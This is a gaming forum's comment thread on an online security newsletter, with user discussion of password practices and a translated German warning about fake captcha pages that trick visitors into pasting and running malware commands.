Blog Post

EA Forums Info Hub
3 MIN READ

EA Forums Online Security Newsletter - Volume 2

EA_Kalina's avatar
EA_Kalina
Icon for Community Manager rankCommunity Manager
6 months ago
  Hey everyone,  welcome to the second edition of our newsletter dedicated to online safety for gamers.  Last month, we examined security measures designed to protect us from malicious programs...
Updated 6 months ago
Version 1.0
community highlights
cybersecurity
danisoff's avatar
danisoff
Hero
6 months ago

I agree that strong, unique passwords are essential for security. Saving passwords can be safe, but I personally prefer to keep everything compartmented. This means that if one account gets compromised, there's no way for an attacker to use that information to access my other accounts.

This is exactly why I think using a password manager is a bad idea. Even if it's well-protected and encrypted, there's always a risk of it being compromised. If that happens, all stored passwords could potentially be exposed at once. Keeping passwords separate and manually managed reduces the impact of a single breach.

I wish I could find my old article on phishing so I could contribute more to the discussion, but it seems to be lost in one of the older security newsletters. 

Keep up the great work! 

  • ElliotLH's avatar
    ElliotLH
    Hero+
    5 months ago

    I can try and see if I can find it since knowledge is power and I'd like to read it. Wish we had a search feature for our posts as it'd make it much easier (at least I don't need to search through my 10,272 posts haha).

    --

    Awesome newsletter as always :) I'll try to kick my brain into gear so I can add something valuable. 

    • danisoff's avatar
      danisoff
      Hero
      5 months ago

      Definitely, I have to agree. 😉

      • ElliotLH's avatar
        ElliotLH
        Hero+
        5 months ago

        Sorry, dude, but I've not been successful. I've gone through all of the archived newsletters but most of them don't seem to have comments now, and I can't see it in your post history. The closest I can get is the comment below, but I'm not sure if that was the right one as I can't read it to check since it was a link to AHQ. 

        EA Forums Online Security Newsletter - September | EA Forums - 4979035 

  • Asmodeus566's avatar
    Asmodeus566
    Hero+
    5 months ago

    Hey all got some new news for you out of Germany. I translated the news article into English and there might be some minor mistakes but I am sure you all will get the meaning: 

    Checkbox as Bait You're not a robot? Malware could be lurking behind captchas. Everyone is familiar with checkboxes or image challenges to prove that you're a human and not a machine. This gives so-called captchas a certain level of trust. Cybercriminals exploit this mercilessly.

    Anyone who currently encounters "I am not a robot" captchas when opening websites should be especially cautious after clicking the green confirmation checkbox. If access to the site is granted as normal after checking the box, everything is fine.

    However, if another banner appears after the checkbox prompt with instructions to execute keyboard shortcuts, you've landed on a highly dangerous, manipulated website that intends to inject malware onto your computer. The Federal Office for Information Security (BSI) is currently warning against this again. In this case, abort immediately and close your browser.

    If captchas require key combinations, something is wrong.

    The attack method first appeared at the end of 2024 and was documented by the Swiss Federal Office for Cyber ​​Security (BACS): The fact that the initial attempt was already a fake captcha becomes clear when a second banner appears, demanding the execution of various key combinations for alleged further verification.

    The perfidious attack explained in detail:

    1. By checking the "I am not a robot" captcha box, a malicious command has already been copied to the clipboard. And here's what the cybercriminals want unsuspecting users to do next:
    2.  In the second banner, they are then prompted to open a Windows input field using a keyboard shortcut.
    3. Using another keyboard shortcut, they are then supposed to paste the dangerous command from the clipboard into the input field and then execute it.
    4. Malware is then downloaded and installed from an attacker's server, which has devastating capabilities, such as: Collecting information, for example from the operating system, web browsers, or messengers; Stealing sensitive access or payment information, such as passwords or credit card details; Attacking crypto wallets or authentication processes, such as those for online banking; Executing any other commands; Injecting any other malware.

     

    Since many malware programs make profound changes to the system that cannot be easily reversed, victims should restart their entire computer as a precaution after an actual infection with the malware from the CAPTCHA attack, advises the BACS.

    After an infection, victims must take action. This means in detail:

    Reinstall the operating system completely and, if possible, restore their data from backups on external storage devices. If there is no or no up-to-date data backup on external storage devices, which no user should be without, their data must of course be backed up before reinstalling the computer. Additionally, as a precaution, all online account passwords should be changed, especially those for email accounts.

  • EA_Kuba's avatar
    EA_Kuba
    Icon for Community Manager rankCommunity Manager
    5 months ago

    Hey, danisoff thanks for sharing your thoughts about passwords. Exactly! There are two concepts for keeping your account passwords safe. While good password hygiene without password managers is possible, it might not be a solution for everyone. At the end of the day, this is a personal preference. Maybe a mix between your approach and using a password manager could be a good solution. Or maybe spread your passwords among a few password manager providers?  Possibilities are endless ;) 

    Regarding your article about phishing. Is that this one? :)

     

    • danisoff's avatar
      danisoff
      Hero
      5 months ago

      Well said! Always happy to hear from you EA_Kuba. Yes, using multiple password managers is definitely better than relying on just one. That would be a much safer compromise.

      Also, thank you for finding the original post! Is it archived somewhere or is it just an old screenshot? Nonetheless, I really appreciate you taking the time to track it down. 🙂

      • GawgPorkChop's avatar
        GawgPorkChop
        New Veteran
        5 months ago

        Good stuff. Quick story. Until 2016 I used one password for several sites. I stopped that and use long complex ones, never duplicated since then.

        Here is the fun bit. I check my "dark web profile," on some google service a couple of months back.

        Guess what? My re-used password is still listed. It's harmless as I have changed all, or closed accounts with it over 7 years ago, but it's still there. Kind of funny, but quite a shock at first.

        There is no harm in me typing the password that I used as I would never use any thing without letters, Capitals, numbers, and characters (% & $ etc) now and haven't done so since back then.

        My really old password was Morrowind. Oh the innocence! Oh the stupidity. I was playing that game back in 2012 or so and used it as my normal password for everything. Kind of embarrassed, but I totally, suddently grasped how silly I had been almost a decade ago, so I am sharing.

        BTW: Nothing was ever compromised. Luck probably. Also doing that now in 2025 without 2fa and bank accounts would be emptied. CC bill would include a Porshe 911, I identidy would be gone!!

        Should have added, of course I deleted, and haven't used the account (an old hotmail one) since 2016.

        Pretty amazed Google picked it up. Not that it will do anyone any good, - I mean bad!